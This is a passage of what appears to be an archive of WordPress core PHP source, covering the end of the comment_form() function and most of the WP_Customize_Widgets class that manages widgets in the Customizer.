'<input id="email" name="email" %s value="%s" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email"%s />',
( $html5 ? 'type="email"' : 'type="text"' ),
esc_attr( $commenter['comment_author_email'] ),
( $req ? $required_attribute : '' )
)
),
'url' => sprintf(
'<p class="comment-form-url">%s %s</p>',
sprintf(
'<label for="url">%s</label>',
__( 'Website' )
),
sprintf(
'<input id="url" name="url" %s value="%s" size="30" maxlength="200" autocomplete="url" />',
( $html5 ? 'type="url"' : 'type="text"' ),
esc_attr( $commenter['comment_author_url'] )
)
),
);
if ( has_action( 'set_comment_cookies', 'wp_set_comment_cookies' ) && get_option( 'show_comments_cookies_opt_in' ) ) {
$consent = empty( $commenter['comment_author_email'] ) ? '' : $checked_attribute;
$fields['cookies'] = sprintf(
'<p class="comment-form-cookies-consent">%s %s</p>',
sprintf(
'<input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"%s />',
$consent
),
sprintf(
'<label for="wp-comment-cookies-consent">%s</label>',
__( 'Save my name, email, and website in this browser for the next time I comment.' )
)
);
// Ensure that the passed fields include cookies consent.
if ( isset( $args['fields'] ) && ! isset( $args['fields']['cookies'] ) ) {
$args['fields']['cookies'] = $fields['cookies'];
}
}
$original_fields = $fields;
/**
* Filters the default comment form fields.
*
* @since 3.0.0
*
* @param string[] $fields Array of the default comment fields.
*/
$fields = apply_filters( 'comment_form_default_fields', $fields );
$defaults = array(
'fields' => $fields,
'comment_field' => sprintf(
'<p class="comment-form-comment">%s %s</p>',
sprintf(
'<label for="comment">%s%s</label>',
_x( 'Comment', 'noun' ),
$required_indicator
),
'<textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525"' . $required_attribute . '></textarea>'
),
'must_log_in' => sprintf(
'<p class="must-log-in">%s</p>',
sprintf(
/* translators: %s: Login URL. */
__( 'You must be <a href="%s">logged in</a> to post a comment.' ),
/** This filter is documented in wp-includes/link-template.php */
wp_login_url( apply_filters( 'the_permalink', get_permalink( $post_id ), $post_id ) )
)
),
'logged_in_as' => sprintf(
'<p class="logged-in-as">%s%s</p>',
sprintf(
/* translators: 1: User name, 2: Edit user link, 3: Logout URL. */
__( 'Logged in as %1$s. <a href="%2$s">Edit your profile</a>. <a href="%3$s">Log out?</a>' ),
$user_identity,
get_edit_user_link(),
/** This filter is documented in wp-includes/link-template.php */
wp_logout_url( apply_filters( 'the_permalink', get_permalink( $post_id ), $post_id ) )
),
$required_text
),
'comment_notes_before' => sprintf(
'<p class="comment-notes">%s%s</p>',
sprintf(
'<span id="email-notes">%s</span>',
__( 'Your email address will not be published.' )
),
$required_text
),
'comment_notes_after' => '',
'action' => site_url( '/wp-comments-post.php' ),
'novalidate' => false,
'id_form' => 'commentform',
'id_submit' => 'submit',
'class_container' => 'comment-respond',
'class_form' => 'comment-form',
'class_submit' => 'submit',
'name_submit' => 'submit',
'title_reply' => __( 'Leave a Reply' ),
/* translators: %s: Author of the comment being replied to. */
'title_reply_to' => __( 'Leave a Reply to %s' ),
'title_reply_before' => '<h3 id="reply-title" class="comment-reply-title">',
'title_reply_after' => '</h3>',
'cancel_reply_before' => ' <small>',
'cancel_reply_after' => '</small>',
'cancel_reply_link' => __( 'Cancel reply' ),
'label_submit' => __( 'Post Comment' ),
'submit_button' => '<input name="%1$s" type="submit" id="%2$s" class="%3$s" value="%4$s" />',
'submit_field' => '<p class="form-submit">%1$s %2$s</p>',
'format' => 'xhtml',
);
/**
* Filters the comment form default arguments.
*
* Use {@see 'comment_form_default_fields'} to filter the comment fields.
*
* @since 3.0.0
*
* @param array $defaults The default comment form arguments.
*/
$args = wp_parse_args( $args, apply_filters( 'comment_form_defaults', $defaults ) );
// Ensure that the filtered arguments contain all required default values.
$args = array_merge( $defaults, $args );
// Remove `aria-describedby` from the email field if there's no associated description.
if ( isset( $args['fields']['email'] ) && ! str_contains( $args['comment_notes_before'], 'id="email-notes"' ) ) {
$args['fields']['email'] = str_replace(
' aria-describedby="email-notes"',
'',
$args['fields']['email']
);
}
/**
* Fires before the comment form.
*
* @since 3.0.0
*/
do_action( 'comment_form_before' );
?>
<div id="respond" class="<?php echo esc_attr( $args['class_container'] ); ?>">
<?php
echo $args['title_reply_before'];
comment_form_title( $args['title_reply'], $args['title_reply_to'], true, $post_id );
if ( get_option( 'thread_comments' ) ) {
echo $args['cancel_reply_before'];
cancel_comment_reply_link( $args['cancel_reply_link'] );
echo $args['cancel_reply_after'];
}
echo $args['title_reply_after'];
if ( get_option( 'comment_registration' ) && ! is_user_logged_in() ) :
echo $args['must_log_in'];
/**
* Fires after the HTML-formatted 'must log in after' message in the comment form.
*
* @since 3.0.0
*/
do_action( 'comment_form_must_log_in_after' );
else :
printf(
'<form action="%s" method="post" id="%s" class="%s"%s>',
esc_url( $args['action'] ),
esc_attr( $args['id_form'] ),
esc_attr( $args['class_form'] ),
( $args['novalidate'] ? ' novalidate' : '' )
);
/**
* Fires at the top of the comment form, inside the form tag.
*
* @since 3.0.0
*/
do_action( 'comment_form_top' );
if ( is_user_logged_in() ) :
/**
* Filters the 'logged in' message for the comment form for display.
*
* @since 3.0.0
*
* @param string $args_logged_in The HTML for the 'logged in as [user]' message,
* the Edit profile link, and the Log out link.
* @param array $commenter An array containing the comment author's
* username, email, and URL.
* @param string $user_identity If the commenter is a registered user,
* the display name, blank otherwise.
*/
echo apply_filters( 'comment_form_logged_in', $args['logged_in_as'], $commenter, $user_identity );
/**
* Fires after the is_user_logged_in() check in the comment form.
*
* @since 3.0.0
*
* @param array $commenter An array containing the comment author's
* username, email, and URL.
* @param string $user_identity If the commenter is a registered user,
* the display name, blank otherwise.
*/
do_action( 'comment_form_logged_in_after', $commenter, $user_identity );
else :
echo $args['comment_notes_before'];
endif;
// Prepare an array of all fields, including the textarea.
$comment_fields = array( 'comment' => $args['comment_field'] ) + (array) $args['fields'];
/**
* Filters the comment form fields, including the textarea.
*
* @since 4.4.0
*
* @param array $comment_fields The comment fields.
*/
$comment_fields = apply_filters( 'comment_form_fields', $comment_fields );
// Get an array of field names, excluding the textarea.
$comment_field_keys = array_diff( array_keys( $comment_fields ), array( 'comment' ) );
// Get the first and the last field name, excluding the textarea.
$first_field = reset( $comment_field_keys );
$last_field = end( $comment_field_keys );
foreach ( $comment_fields as $name => $field ) {
if ( 'comment' === $name ) {
/**
* Filters the content of the comment textarea field for display.
*
* @since 3.0.0
*
* @param string $args_comment_field The content of the comment textarea field.
*/
echo apply_filters( 'comment_form_field_comment', $field );
echo $args['comment_notes_after'];
} elseif ( ! is_user_logged_in() || ! isset( $original_fields[ $name ] ) ) {
if ( $first_field === $name ) {
/**
* Fires before the comment fields in the comment form, excluding the textarea.
*
* @since 3.0.0
*/
do_action( 'comment_form_before_fields' );
}
/**
* Filters a comment form field for display.
*
* The dynamic portion of the hook name, `$name`, refers to the name
* of the comment form field.
*
* Possible hook names include:
*
* - `comment_form_field_comment`
* - `comment_form_field_author`
* - `comment_form_field_email`
* - `comment_form_field_url`
* - `comment_form_field_cookies`
*
* @since 3.0.0
*
* @param string $field The HTML-formatted output of the comment form field.
*/
echo apply_filters( "comment_form_field_{$name}", $field ) . "\n";
if ( $last_field === $name ) {
/**
* Fires after the comment fields in the comment form, excluding the textarea.
*
* @since 3.0.0
*/
do_action( 'comment_form_after_fields' );
}
}
}
$submit_button = sprintf(
$args['submit_button'],
esc_attr( $args['name_submit'] ),
esc_attr( $args['id_submit'] ),
esc_attr( $args['class_submit'] ),
esc_attr( $args['label_submit'] )
);
/**
* Filters the submit button for the comment form to display.
*
* @since 4.2.0
*
* @param string $submit_button HTML markup for the submit button.
* @param array $args Arguments passed to comment_form().
*/
$submit_button = apply_filters( 'comment_form_submit_button', $submit_button, $args );
$submit_field = sprintf(
$args['submit_field'],
$submit_button,
get_comment_id_fields( $post_id )
);
/**
* Filters the submit field for the comment form to display.
*
* The submit field includes the submit button, hidden fields for the
* comment form, and any wrapper markup.
*
* @since 4.2.0
*
* @param string $submit_field HTML markup for the submit field.
* @param array $args Arguments passed to comment_form().
*/
echo apply_filters( 'comment_form_submit_field', $submit_field, $args );
/**
* Fires at the bottom of the comment form, inside the closing form tag.
*
* @since 1.5.0
*
* @param int $post_id The post ID.
*/
do_action( 'comment_form', $post_id );
echo '</form>';
endif;
?>
</div><!-- #respond -->
<?php
/**
* Fires after the comment form.
*
* @since 3.0.0
*/
do_action( 'comment_form_after' );
}
class-wp-customize-widgets.php 0000666 00000215637 15224151220 0012506 0 ustar 00 <?php
/**
* WordPress Customize Widgets classes
*
* @package WordPress
* @subpackage Customize
* @since 3.9.0
*/
/**
* Customize Widgets class.
*
* Implements widget management in the Customizer.
*
* @since 3.9.0
*
* @see WP_Customize_Manager
*/
#[AllowDynamicProperties]
final class WP_Customize_Widgets {
/**
* WP_Customize_Manager instance.
*
* @since 3.9.0
* @var WP_Customize_Manager
*/
public $manager;
/**
* All id_bases for widgets defined in core.
*
* @since 3.9.0
* @var array
*/
protected $core_widget_id_bases = array(
'archives',
'calendar',
'categories',
'custom_html',
'links',
'media_audio',
'media_image',
'media_video',
'meta',
'nav_menu',
'pages',
'recent-comments',
'recent-posts',
'rss',
'search',
'tag_cloud',
'text',
);
/**
* @since 3.9.0
* @var array
*/
protected $rendered_sidebars = array();
/**
* @since 3.9.0
* @var array
*/
protected $rendered_widgets = array();
/**
* @since 3.9.0
* @var array
*/
protected $old_sidebars_widgets = array();
/**
* Mapping of widget ID base to whether it supports selective refresh.
*
* @since 4.5.0
* @var array
*/
protected $selective_refreshable_widgets;
/**
* Mapping of setting type to setting ID pattern.
*
* @since 4.2.0
* @var array
*/
protected $setting_id_patterns = array(
'widget_instance' => '/^widget_(?P<id_base>.+?)(?:\[(?P<widget_number>\d+)\])?$/',
'sidebar_widgets' => '/^sidebars_widgets\[(?P<sidebar_id>.+?)\]$/',
);
/**
* Initial loader.
*
* @since 3.9.0
*
* @param WP_Customize_Manager $manager Customizer bootstrap instance.
*/
public function __construct( $manager ) {
$this->manager = $manager;
// See https://github.com/xwp/wp-customize-snapshots/blob/962586659688a5b1fd9ae93618b7ce2d4e7a421c/php/class-customize-snapshot-manager.php#L420-L449
add_filter( 'customize_dynamic_setting_args', array( $this, 'filter_customize_dynamic_setting_args' ), 10, 2 );
add_action( 'widgets_init', array( $this, 'register_settings' ), 95 );
add_action( 'customize_register', array( $this, 'schedule_customize_register' ), 1 );
// Skip remaining hooks when the user can't manage widgets anyway.
if ( ! current_user_can( 'edit_theme_options' ) ) {
return;
}
add_action( 'wp_loaded', array( $this, 'override_sidebars_widgets_for_theme_switch' ) );
add_action( 'customize_controls_init', array( $this, 'customize_controls_init' ) );
add_action( 'customize_controls_enqueue_scripts', array( $this, 'enqueue_scripts' ) );
add_action( 'customize_controls_print_styles', array( $this, 'print_styles' ) );
add_action( 'customize_controls_print_scripts', array( $this, 'print_scripts' ) );
add_action( 'customize_controls_print_footer_scripts', array( $this, 'print_footer_scripts' ) );
add_action( 'customize_controls_print_footer_scripts', array( $this, 'output_widget_control_templates' ) );
add_action( 'customize_preview_init', array( $this, 'customize_preview_init' ) );
add_filter( 'customize_refresh_nonces', array( $this, 'refresh_nonces' ) );
add_filter( 'should_load_block_editor_scripts_and_styles', array( $this, 'should_load_block_editor_scripts_and_styles' ) );
add_action( 'dynamic_sidebar', array( $this, 'tally_rendered_widgets' ) );
add_filter( 'is_active_sidebar', array( $this, 'tally_sidebars_via_is_active_sidebar_calls' ), 10, 2 );
add_filter( 'dynamic_sidebar_has_widgets', array( $this, 'tally_sidebars_via_dynamic_sidebar_calls' ), 10, 2 );
// Selective Refresh.
add_filter( 'customize_dynamic_partial_args', array( $this, 'customize_dynamic_partial_args' ), 10, 2 );
add_action( 'customize_preview_init', array( $this, 'selective_refresh_init' ) );
}
/**
* List whether each registered widget can be use selective refresh.
*
* If the theme does not support the customize-selective-refresh-widgets feature,
* then this will always return an empty array.
*
* @since 4.5.0
*
* @global WP_Widget_Factory $wp_widget_factory
*
* @return array Mapping of id_base to support. If theme doesn't support
* selective refresh, an empty array is returned.
*/
public function get_selective_refreshable_widgets() {
global $wp_widget_factory;
if ( ! current_theme_supports( 'customize-selective-refresh-widgets' ) ) {
return array();
}
if ( ! isset( $this->selective_refreshable_widgets ) ) {
$this->selective_refreshable_widgets = array();
foreach ( $wp_widget_factory->widgets as $wp_widget ) {
$this->selective_refreshable_widgets[ $wp_widget->id_base ] = ! empty( $wp_widget->widget_options['customize_selective_refresh'] );
}
}
return $this->selective_refreshable_widgets;
}
/**
* Determines if a widget supports selective refresh.
*
* @since 4.5.0
*
* @param string $id_base Widget ID Base.
* @return bool Whether the widget can be selective refreshed.
*/
public function is_widget_selective_refreshable( $id_base ) {
$selective_refreshable_widgets = $this->get_selective_refreshable_widgets();
return ! empty( $selective_refreshable_widgets[ $id_base ] );
}
/**
* Retrieves the widget setting type given a setting ID.
*
* @since 4.2.0
*
* @param string $setting_id Setting ID.
* @return string|void Setting type.
*/
protected function get_setting_type( $setting_id ) {
static $cache = array();
if ( isset( $cache[ $setting_id ] ) ) {
return $cache[ $setting_id ];
}
foreach ( $this->setting_id_patterns as $type => $pattern ) {
if ( preg_match( $pattern, $setting_id ) ) {
$cache[ $setting_id ] = $type;
return $type;
}
}
}
/**
* Inspects the incoming customized data for any widget settings, and dynamically adds
* them up-front so widgets will be initialized properly.
*
* @since 4.2.0
*/
public function register_settings() {
$widget_setting_ids = array();
$incoming_setting_ids = array_keys( $this->manager->unsanitized_post_values() );
foreach ( $incoming_setting_ids as $setting_id ) {
if ( ! is_null( $this->get_setting_type( $setting_id ) ) ) {
$widget_setting_ids[] = $setting_id;
}
}
if ( $this->manager->doing_ajax( 'update-widget' ) && isset( $_REQUEST['widget-id'] ) ) {
$widget_setting_ids[] = $this->get_setting_id( wp_unslash( $_REQUEST['widget-id'] ) );
}
$settings = $this->manager->add_dynamic_settings( array_unique( $widget_setting_ids ) );
if ( $this->manager->settings_previewed() ) {
foreach ( $settings as $setting ) {
$setting->preview();
}
}
}
/**
* Determines the arguments for a dynamically-created setting.
*
* @since 4.2.0
*
* @param false|array $args The arguments to the WP_Customize_Setting constructor.
* @param string $setting_id ID for dynamic setting, usually coming from `$_POST['customized']`.
* @return array|false Setting arguments, false otherwise.
*/
public function filter_customize_dynamic_setting_args( $args, $setting_id ) {
if ( $this->get_setting_type( $setting_id ) ) {
$args = $this->get_setting_args( $setting_id );
}
return $args;
}
/**
* Retrieves an unslashed post value or return a default.
*
* @since 3.9.0
*
* @param string $name Post value.
* @param mixed $default_value Default post value.
* @return mixed Unslashed post value or default value.
*/
protected function get_post_value( $name, $default_value = null ) {
if ( ! isset( $_POST[ $name ] ) ) {
return $default_value;
}
return wp_unslash( $_POST[ $name ] );
}
/**
* Override sidebars_widgets for theme switch.
*
* When switching a theme via the Customizer, supply any previously-configured
* sidebars_widgets from the target theme as the initial sidebars_widgets
* setting. Also store the old theme's existing settings so that they can
* be passed along for storing in the sidebars_widgets theme_mod when the
* theme gets switched.
*
* @since 3.9.0
*
* @global array $sidebars_widgets
* @global array $_wp_sidebars_widgets
*/
public function override_sidebars_widgets_for_theme_switch() {
global $sidebars_widgets;
if ( $this->manager->doing_ajax() || $this->manager->is_theme_active() ) {
return;
}
$this->old_sidebars_widgets = wp_get_sidebars_widgets();
add_filter( 'customize_value_old_sidebars_widgets_data', array( $this, 'filter_customize_value_old_sidebars_widgets_data' ) );
$this->manager->set_post_value( 'old_sidebars_widgets_data', $this->old_sidebars_widgets ); // Override any value cached in changeset.
// retrieve_widgets() looks at the global $sidebars_widgets.
$sidebars_widgets = $this->old_sidebars_widgets;
$sidebars_widgets = retrieve_widgets( 'customize' );
add_filter( 'option_sidebars_widgets', array( $this, 'filter_option_sidebars_widgets_for_theme_switch' ), 1 );
// Reset global cache var used by wp_get_sidebars_widgets().
unset( $GLOBALS['_wp_sidebars_widgets'] );
}
/**
* Filters old_sidebars_widgets_data Customizer setting.
*
* When switching themes, filter the Customizer setting old_sidebars_widgets_data
* to supply initial $sidebars_widgets before they were overridden by retrieve_widgets().
* The value for old_sidebars_widgets_data gets set in the old theme's sidebars_widgets
* theme_mod.
*
* @since 3.9.0
*
* @see WP_Customize_Widgets::handle_theme_switch()
*
* @param array $old_sidebars_widgets
* @return array
*/
public function filter_customize_value_old_sidebars_widgets_data( $old_sidebars_widgets ) {
return $this->old_sidebars_widgets;
}
/**
* Filters sidebars_widgets option for theme switch.
*
* When switching themes, the retrieve_widgets() function is run when the Customizer initializes,
* and then the new sidebars_widgets here get supplied as the default value for the sidebars_widgets
* option.
*
* @since 3.9.0
*
* @see WP_Customize_Widgets::handle_theme_switch()
* @global array $sidebars_widgets
*
* @param array $sidebars_widgets
* @return array
*/
public function filter_option_sidebars_widgets_for_theme_switch( $sidebars_widgets ) {
$sidebars_widgets = $GLOBALS['sidebars_widgets'];
$sidebars_widgets['array_version'] = 3;
return $sidebars_widgets;
}
/**
* Ensures all widgets get loaded into the Customizer.
*
* Note: these actions are also fired in wp_ajax_update_widget().
*
* @since 3.9.0
*/
public function customize_controls_init() {
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'load-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/widgets.php */
do_action( 'sidebar_admin_setup' );
}
/**
* Ensures widgets are available for all types of previews.
*
* When in preview, hook to {@see 'customize_register'} for settings after WordPress is loaded
* so that all filters have been initialized (e.g. Widget Visibility).
*
* @since 3.9.0
*/
public function schedule_customize_register() {
if ( is_admin() ) {
$this->customize_register();
} else {
add_action( 'wp', array( $this, 'customize_register' ) );
}
}
/**
* Registers Customizer settings and controls for all sidebars and widgets.
*
* @since 3.9.0
*
* @global array $wp_registered_widgets
* @global array $wp_registered_widget_controls
* @global array $wp_registered_sidebars
*/
public function customize_register() {
global $wp_registered_widgets, $wp_registered_widget_controls, $wp_registered_sidebars;
$use_widgets_block_editor = wp_use_widgets_block_editor();
add_filter( 'sidebars_widgets', array( $this, 'preview_sidebars_widgets' ), 1 );
$sidebars_widgets = array_merge(
array( 'wp_inactive_widgets' => array() ),
array_fill_keys( array_keys( $wp_registered_sidebars ), array() ),
wp_get_sidebars_widgets()
);
$new_setting_ids = array();
/*
* Register a setting for all widgets, including those which are active,
* inactive, and orphaned since a widget may get suppressed from a sidebar
* via a plugin (like Widget Visibility).
*/
foreach ( array_keys( $wp_registered_widgets ) as $widget_id ) {
$setting_id = $this->get_setting_id( $widget_id );
$setting_args = $this->get_setting_args( $setting_id );
if ( ! $this->manager->get_setting( $setting_id ) ) {
$this->manager->add_setting( $setting_id, $setting_args );
}
$new_setting_ids[] = $setting_id;
}
/*
* Add a setting which will be supplied for the theme's sidebars_widgets
* theme_mod when the theme is switched.
*/
if ( ! $this->manager->is_theme_active() ) {
$setting_id = 'old_sidebars_widgets_data';
$setting_args = $this->get_setting_args(
$setting_id,
array(
'type' => 'global_variable',
'dirty' => true,
)
);
$this->manager->add_setting( $setting_id, $setting_args );
}
$this->manager->add_panel(
'widgets',
array(
'type' => 'widgets',
'title' => __( 'Widgets' ),
'description' => __( 'Widgets are independent sections of content that can be placed into widgetized areas provided by your theme (commonly called sidebars).' ),
'priority' => 110,
'active_callback' => array( $this, 'is_panel_active' ),
'auto_expand_sole_section' => true,
'theme_supports' => 'widgets',
)
);
foreach ( $sidebars_widgets as $sidebar_id => $sidebar_widget_ids ) {
if ( empty( $sidebar_widget_ids ) ) {
$sidebar_widget_ids = array();
}
$is_registered_sidebar = is_registered_sidebar( $sidebar_id );
$is_inactive_widgets = ( 'wp_inactive_widgets' === $sidebar_id );
$is_active_sidebar = ( $is_registered_sidebar && ! $is_inactive_widgets );
// Add setting for managing the sidebar's widgets.
if ( $is_registered_sidebar || $is_inactive_widgets ) {
$setting_id = sprintf( 'sidebars_widgets[%s]', $sidebar_id );
$setting_args = $this->get_setting_args( $setting_id );
if ( ! $this->manager->get_setting( $setting_id ) ) {
if ( ! $this->manager->is_theme_active() ) {
$setting_args['dirty'] = true;
}
$this->manager->add_setting( $setting_id, $setting_args );
}
$new_setting_ids[] = $setting_id;
// Add section to contain controls.
$section_id = sprintf( 'sidebar-widgets-%s', $sidebar_id );
if ( $is_active_sidebar ) {
$section_args = array(
'title' => $wp_registered_sidebars[ $sidebar_id ]['name'],
'priority' => array_search( $sidebar_id, array_keys( $wp_registered_sidebars ), true ),
'panel' => 'widgets',
'sidebar_id' => $sidebar_id,
);
if ( $use_widgets_block_editor ) {
$section_args['description'] = '';
} else {
$section_args['description'] = $wp_registered_sidebars[ $sidebar_id ]['description'];
}
/**
* Filters Customizer widget section arguments for a given sidebar.
*
* @since 3.9.0
*
* @param array $section_args Array of Customizer widget section arguments.
* @param string $section_id Customizer section ID.
* @param int|string $sidebar_id Sidebar ID.
*/
$section_args = apply_filters( 'customizer_widgets_section_args', $section_args, $section_id, $sidebar_id );
$section = new WP_Customize_Sidebar_Section( $this->manager, $section_id, $section_args );
$this->manager->add_section( $section );
if ( $use_widgets_block_editor ) {
$control = new WP_Sidebar_Block_Editor_Control(
$this->manager,
$setting_id,
array(
'section' => $section_id,
'sidebar_id' => $sidebar_id,
'label' => $section_args['title'],
'description' => $section_args['description'],
)
);
} else {
$control = new WP_Widget_Area_Customize_Control(
$this->manager,
$setting_id,
array(
'section' => $section_id,
'sidebar_id' => $sidebar_id,
'priority' => count( $sidebar_widget_ids ), // place 'Add Widget' and 'Reorder' buttons at end.
)
);
}
$this->manager->add_control( $control );
$new_setting_ids[] = $setting_id;
}
}
if ( ! $use_widgets_block_editor ) {
// Add a control for each active widget (located in a sidebar).
foreach ( $sidebar_widget_ids as $i => $widget_id ) {
// Skip widgets that may have gone away due to a plugin being deactivated.
if ( ! $is_active_sidebar || ! isset( $wp_registered_widgets[ $widget_id ] ) ) {
continue;
}
$registered_widget = $wp_registered_widgets[ $widget_id ];
$setting_id = $this->get_setting_id( $widget_id );
$id_base = $wp_registered_widget_controls[ $widget_id ]['id_base'];
$control = new WP_Widget_Form_Customize_Control(
$this->manager,
$setting_id,
array(
'label' => $registered_widget['name'],
'section' => $section_id,
'sidebar_id' => $sidebar_id,
'widget_id' => $widget_id,
'widget_id_base' => $id_base,
'priority' => $i,
'width' => $wp_registered_widget_controls[ $widget_id ]['width'],
'height' => $wp_registered_widget_controls[ $widget_id ]['height'],
'is_wide' => $this->is_wide_widget( $widget_id ),
)
);
$this->manager->add_control( $control );
}
}
}
if ( $this->manager->settings_previewed() ) {
foreach ( $new_setting_ids as $new_setting_id ) {
$this->manager->get_setting( $new_setting_id )->preview();
}
}
}
/**
* Determines whether the widgets panel is active, based on whether there are sidebars registered.
*
* @since 4.4.0
*
* @see WP_Customize_Panel::$active_callback
*
* @global array $wp_registered_sidebars
*
* @return bool Active.
*/
public function is_panel_active() {
global $wp_registered_sidebars;
return ! empty( $wp_registered_sidebars );
}
/**
* Converts a widget_id into its corresponding Customizer setting ID (option name).
*
* @since 3.9.0
*
* @param string $widget_id Widget ID.
* @return string Maybe-parsed widget ID.
*/
public function get_setting_id( $widget_id ) {
$parsed_widget_id = $this->parse_widget_id( $widget_id );
$setting_id = sprintf( 'widget_%s', $parsed_widget_id['id_base'] );
if ( ! is_null( $parsed_widget_id['number'] ) ) {
$setting_id .= sprintf( '[%d]', $parsed_widget_id['number'] );
}
return $setting_id;
}
/**
* Determines whether the widget is considered "wide".
*
* Core widgets which may have controls wider than 250, but can still be shown
* in the narrow Customizer panel. The RSS and Text widgets in Core, for example,
* have widths of 400 and yet they still render fine in the Customizer panel.
*
* This method will return all Core widgets as being not wide, but this can be
* overridden with the {@see 'is_wide_widget_in_customizer'} filter.
*
* @since 3.9.0
*
* @global array $wp_registered_widget_controls
*
* @param string $widget_id Widget ID.
* @return bool Whether or not the widget is a "wide" widget.
*/
public function is_wide_widget( $widget_id ) {
global $wp_registered_widget_controls;
$parsed_widget_id = $this->parse_widget_id( $widget_id );
$width = $wp_registered_widget_controls[ $widget_id ]['width'];
$is_core = in_array( $parsed_widget_id['id_base'], $this->core_widget_id_bases, true );
$is_wide = ( $width > 250 && ! $is_core );
/**
* Filters whether the given widget is considered "wide".
*
* @since 3.9.0
*
* @param bool $is_wide Whether the widget is wide, Default false.
* @param string $widget_id Widget ID.
*/
return apply_filters( 'is_wide_widget_in_customizer', $is_wide, $widget_id );
}
/**
* Converts a widget ID into its id_base and number components.
*
* @since 3.9.0
*
* @param string $widget_id Widget ID.
* @return array Array containing a widget's id_base and number components.
*/
public function parse_widget_id( $widget_id ) {
$parsed = array(
'number' => null,
'id_base' => null,
);
if ( preg_match( '/^(.+)-(\d+)$/', $widget_id, $matches ) ) {
$parsed['id_base'] = $matches[1];
$parsed['number'] = (int) $matches[2];
} else {
// Likely an old single widget.
$parsed['id_base'] = $widget_id;
}
return $parsed;
}
/**
* Converts a widget setting ID (option path) to its id_base and number components.
*
* @since 3.9.0
*
* @param string $setting_id Widget setting ID.
* @return array|WP_Error Array containing a widget's id_base and number components,
* or a WP_Error object.
*/
public function parse_widget_setting_id( $setting_id ) {
if ( ! preg_match( '/^(widget_(.+?))(?:\[(\d+)\])?$/', $setting_id, $matches ) ) {
return new WP_Error( 'widget_setting_invalid_id' );
}
$id_base = $matches[2];
$number = isset( $matches[3] ) ? (int) $matches[3] : null;
return compact( 'id_base', 'number' );
}
/**
* Calls admin_print_styles-widgets.php and admin_print_styles hooks to
* allow custom styles from plugins.
*
* @since 3.9.0
*/
public function print_styles() {
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_styles-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_styles' );
}
/**
* Calls admin_print_scripts-widgets.php and admin_print_scripts hooks to
* allow custom scripts from plugins.
*
* @since 3.9.0
*/
public function print_scripts() {
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_scripts-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_scripts' );
}
/**
* Enqueues scripts and styles for Customizer panel and export data to JavaScript.
*
* @since 3.9.0
*
* @global WP_Scripts $wp_scripts
* @global array $wp_registered_sidebars
* @global array $wp_registered_widgets
*/
public function enqueue_scripts() {
global $wp_scripts, $wp_registered_sidebars, $wp_registered_widgets;
wp_enqueue_style( 'customize-widgets' );
wp_enqueue_script( 'customize-widgets' );
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_enqueue_scripts', 'widgets.php' );
/*
* Export available widgets with control_tpl removed from model
* since plugins need templates to be in the DOM.
*/
$available_widgets = array();
foreach ( $this->get_available_widgets() as $available_widget ) {
unset( $available_widget['control_tpl'] );
$available_widgets[] = $available_widget;
}
$widget_reorder_nav_tpl = sprintf(
'<div class="widget-reorder-nav"><span class="move-widget" tabindex="0">%1$s</span><span class="move-widget-down" tabindex="0">%2$s</span><span class="move-widget-up" tabindex="0">%3$s</span></div>',
__( 'Move to another area…' ),
__( 'Move down' ),
__( 'Move up' )
);
$move_widget_area_tpl = str_replace(
array( '{description}', '{btn}' ),
array(
__( 'Select an area to move this widget into:' ),
_x( 'Move', 'Move widget' ),
),
'<div class="move-widget-area">
<p class="description">{description}</p>
<ul class="widget-area-select">
<% _.each( sidebars, function ( sidebar ){ %>
<li class="" data-id="<%- sidebar.id %>" tabindex="0">
<div><strong><%- sidebar.name %></strong></div>
<div><%- sidebar.description %></div>
</li>
<% }); %>
</ul>
<div class="move-widget-actions">
<button class="move-widget-btn button" type="button">{btn}</button>
</div>
</div>'
);
/*
* Gather all strings in PHP that may be needed by JS on the client.
* Once JS i18n is implemented (in #20491), this can be removed.
*/
$some_non_rendered_areas_messages = array();
$some_non_rendered_areas_messages[1] = html_entity_decode(
__( 'Your theme has 1 other widget area, but this particular page does not display it.' ),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
$registered_sidebar_count = count( $wp_registered_sidebars );
for ( $non_rendered_count = 2; $non_rendered_count < $registered_sidebar_count; $non_rendered_count++ ) {
$some_non_rendered_areas_messages[ $non_rendered_count ] = html_entity_decode(
sprintf(
/* translators: %s: The number of other widget areas registered but not rendered. */
_n(
'Your theme has %s other widget area, but this particular page does not display it.',
'Your theme has %s other widget areas, but this particular page does not display them.',
$non_rendered_count
),
number_format_i18n( $non_rendered_count )
),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
}
if ( 1 === $registered_sidebar_count ) {
$no_areas_shown_message = html_entity_decode(
sprintf(
__( 'Your theme has 1 widget area, but this particular page does not display it.' )
),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
} else {
$no_areas_shown_message = html_entity_decode(
sprintf(
/* translators: %s: The total number of widget areas registered. */
_n(
'Your theme has %s widget area, but this particular page does not display it.',
'Your theme has %s widget areas, but this particular page does not display them.',
$registered_sidebar_count
),
number_format_i18n( $registered_sidebar_count )
),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
}
$settings = array(
'registeredSidebars' => array_values( $wp_registered_sidebars ),
'registeredWidgets' => $wp_registered_widgets,
'availableWidgets' => $available_widgets, // @todo Merge this with registered_widgets.
'l10n' => array(
'saveBtnLabel' => __( 'Apply' ),
'saveBtnTooltip' => __( 'Save and preview changes before publishing them.' ),
'removeBtnLabel' => __( 'Remove' ),
'removeBtnTooltip' => __( 'Keep widget settings and move it to the inactive widgets' ),
'error' => __( 'An error has occurred. Please reload the page and try again.' ),
'widgetMovedUp' => __( 'Widget moved up' ),
